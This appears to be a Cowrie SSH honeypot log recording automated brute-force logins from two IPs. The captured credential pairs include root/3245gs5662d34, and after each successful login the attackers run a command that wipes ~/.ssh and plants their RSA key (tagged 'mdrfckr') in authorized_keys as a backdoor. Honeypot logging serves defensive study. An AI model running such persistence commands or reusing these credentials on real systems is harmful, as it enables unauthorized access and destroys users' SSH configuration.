{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:56:52.492141Z","src_ip":"213.6.203.226","session":"75725d33937e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:56:52.558161Z","src_ip":"213.6.203.226","session":"75725d33937e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:56:52.704636Z","src_ip":"213.6.203.226","session":"75725d33937e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:56:52.705346Z","src_ip":"213.6.203.226","session":"75725d33937e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:56:52.772234Z","src_ip":"213.6.203.226","session":"75725d33937e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:56:52.773054Z","src_ip":"213.6.203.226","session":"75725d33937e"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":58264,"dst_ip":"1.2.3.4","dst_port":22,"session":"93610d61b194","protocol":"ssh","message":"New connection: 213.6.203.226:58264 (1.2.3.4:22) [session: 93610d61b194]","sensor":"my-vps","timestamp":"2025-09-09T05:56:52.841995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:56:52.842700Z","src_ip":"213.6.203.226","session":"93610d61b194"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:56:52.912066Z","src_ip":"213.6.203.226","session":"93610d61b194"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:56:52.923340Z","src_ip":"212.227.235.229","session":"c5cb645a947d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:56:53.225773Z","src_ip":"213.6.203.226","session":"93610d61b194"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:56:54.296255Z","src_ip":"213.6.203.226","session":"93610d61b194"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":58097,"dst_ip":"1.2.3.4","dst_port":22,"session":"012aa175e985","protocol":"ssh","message":"New connection: 213.6.203.226:58097 (1.2.3.4:22) [session: 012aa175e985]","sensor":"my-vps","timestamp":"2025-09-09T05:56:54.364020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:56:54.364727Z","src_ip":"213.6.203.226","session":"012aa175e985"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:56:54.434323Z","src_ip":"213.6.203.226","session":"012aa175e985"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:56:54.748537Z","src_ip":"213.6.203.226","session":"012aa175e985"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:56:54.817870Z","src_ip":"213.6.203.226","session":"75725d33937e"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:56:54.819821Z","src_ip":"213.6.203.226","session":"012aa175e985"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64460,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7864c521180","protocol":"ssh","message":"New connection: 212.227.235.229:64460 (1.2.3.4:22) [session: f7864c521180]","sensor":"my-vps","timestamp":"2025-09-09T05:57:30.180853Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:57:30.181496Z","src_ip":"212.227.235.229","session":"f7864c521180"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43322,"dst_ip":"1.2.3.4","dst_port":22,"session":"502c6ccc7d2b","protocol":"ssh","message":"New connection: 212.227.235.229:43322 (1.2.3.4:22) [session: 502c6ccc7d2b]","sensor":"my-vps","timestamp":"2025-09-09T05:57:30.227712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:57:30.228746Z","src_ip":"212.227.235.229","session":"502c6ccc7d2b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:57:30.322456Z","src_ip":"212.227.235.229","session":"f7864c521180"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:57:30.410062Z","src_ip":"212.227.235.229","session":"502c6ccc7d2b"}
{"eventid":"cowrie.login.failed","username":"server","password":"Password1","message":"login attempt [server/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T05:57:30.893897Z","src_ip":"212.227.235.229","session":"f7864c521180"}
{"eventid":"cowrie.login.success","username":"root","password":"Ws123456@","message":"login attempt [root/Ws123456@] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:57:31.117572Z","src_ip":"212.227.235.229","session":"502c6ccc7d2b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:57:31.522910Z","src_ip":"212.227.235.229","session":"502c6ccc7d2b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:57:31.523668Z","src_ip":"212.227.235.229","session":"502c6ccc7d2b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:57:31.524452Z","src_ip":"212.227.235.229","session":"502c6ccc7d2b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:57:31.880343Z","src_ip":"212.227.235.229","session":"502c6ccc7d2b"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:57:32.023803Z","src_ip":"212.227.235.229","session":"f7864c521180"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:57:32.118788Z","src_ip":"212.227.235.229","session":"502c6ccc7d2b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:57:32.119523Z","src_ip":"212.227.235.229","session":"502c6ccc7d2b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:57:32.308593Z","src_ip":"212.227.235.229","session":"502c6ccc7d2b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:57:32.309502Z","src_ip":"212.227.235.229","session":"502c6ccc7d2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44118,"dst_ip":"1.2.3.4","dst_port":22,"session":"748eda46ab9a","protocol":"ssh","message":"New connection: 212.227.235.229:44118 (1.2.3.4:22) [session: 748eda46ab9a]","sensor":"my-vps","timestamp":"2025-09-09T05:57:32.497704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:57:32.502387Z","src_ip":"212.227.235.229","session":"748eda46ab9a"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:57:32.685614Z","src_ip":"212.227.235.229","session":"748eda46ab9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55696,"dst_ip":"1.2.3.4","dst_port":22,"session":"193c938af17d","protocol":"ssh","message":"New connection: 212.227.235.229:55696 (1.2.3.4:22) [session: 193c938af17d]","sensor":"my-vps","timestamp":"2025-09-09T05:57:32.983273Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:57:32.984164Z","src_ip":"212.227.235.229","session":"193c938af17d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:57:33.062852Z","src_ip":"212.227.235.229","session":"193c938af17d"}
{"eventid":"cowrie.login.failed","username":"gaoyuan","password":"111","message":"login attempt [gaoyuan/111] failed","sensor":"my-vps","timestamp":"2025-09-09T05:57:33.420600Z","src_ip":"212.227.235.229","session":"193c938af17d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:57:33.430506Z","src_ip":"212.227.235.229","session":"748eda46ab9a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:57:34.501659Z","src_ip":"212.227.235.229","session":"193c938af17d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:57:34.623292Z","src_ip":"212.227.235.229","session":"748eda46ab9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44798,"dst_ip":"1.2.3.4","dst_port":22,"session":"63f45c18839d","protocol":"ssh","message":"New connection: 212.227.235.229:44798 (1.2.3.4:22) [session: 63f45c18839d]","sensor":"my-vps","timestamp":"2025-09-09T05:57:34.775169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:57:34.776692Z","src_ip":"212.227.235.229","session":"63f45c18839d"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:57:34.949811Z","src_ip":"212.227.235.229","session":"63f45c18839d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:57:35.620811Z","src_ip":"212.227.235.229","session":"63f45c18839d"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:57:35.791649Z","src_ip":"212.227.235.229","session":"63f45c18839d"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:57:35.797295Z","src_ip":"212.227.235.229","session":"502c6ccc7d2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44122,"dst_ip":"1.2.3.4","dst_port":22,"session":"e103a7c99d23","protocol":"ssh","message":"New connection: 212.227.235.229:44122 (1.2.3.4:22) [session: e103a7c99d23]","sensor":"my-vps","timestamp":"2025-09-09T05:57:37.630121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:57:37.630917Z","src_ip":"212.227.235.229","session":"e103a7c99d23"}
